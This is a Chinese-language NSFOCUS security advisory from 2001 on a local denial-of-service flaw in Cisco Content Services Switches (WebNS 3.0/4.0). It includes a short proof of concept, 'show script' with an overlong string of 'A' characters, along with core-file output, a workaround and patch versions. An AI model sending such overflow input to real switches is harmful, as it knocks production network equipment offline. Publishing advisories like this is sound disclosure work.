安全研究

安全漏洞
Cisco Content Service Switch 长文件名拒绝服务漏洞

发布日期:2001-02-05
更新日期:2001-02-05

受影响系统:

   Cisco WebNS 4.0
   Cisco WebNS 3.0
描述:

BUGTRAQ ID : 2330

Cisco Content Services (CSS) 交换机是硬件设备,它应
用 Cisco Web Network Services (Web NS),被设计用来
为电子商务和 Web 内容传送加速 Web 服务。CSS 交换机由
Cisco 系统分发。

CSS 存在一个问题,这使得本地用户可以进行拒绝服务攻击。
问题发生在对本地用户的输入进行处理时。要进行攻击,用
户必须能访问交换机的命令行界面,但不需要管理权限。当
连接到一个非授权的账号时,用户可以在交换机上执行需要
一个文件名作参数的命令。当所给文件名的长度超过用于存
放文件名的缓冲区的大小时,交换机将重启并开始系统检查。

这个漏洞使得恶意用户可以获得足够的权限,执行导致拒绝
服务的命令。受影响的 CSS 系统有 switches 11050、11150、
和 11800。<* 来源:Ollie Whitehouse (ollie@atstake.com) *>




测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


show script
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA<enter>

Location the core files:
arrowpoint# copy core ?
  readme              AUG  5 19:17:44              4
  xxxxx.0             OCT 25 16:24:02       130024448
  xxxxx.1             OCT 25 16:36:12       130024448





建议:

临时解决办法:

   NSFOCUS建议您限制对CSS交换机的未授权访问。


厂商补丁:

Cisco WebNS revision 4.01(12s)和revision 3.10 (71s)已经解决此问题。
请联系CISCO公司取得补丁程序。


浏览次数:3939
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障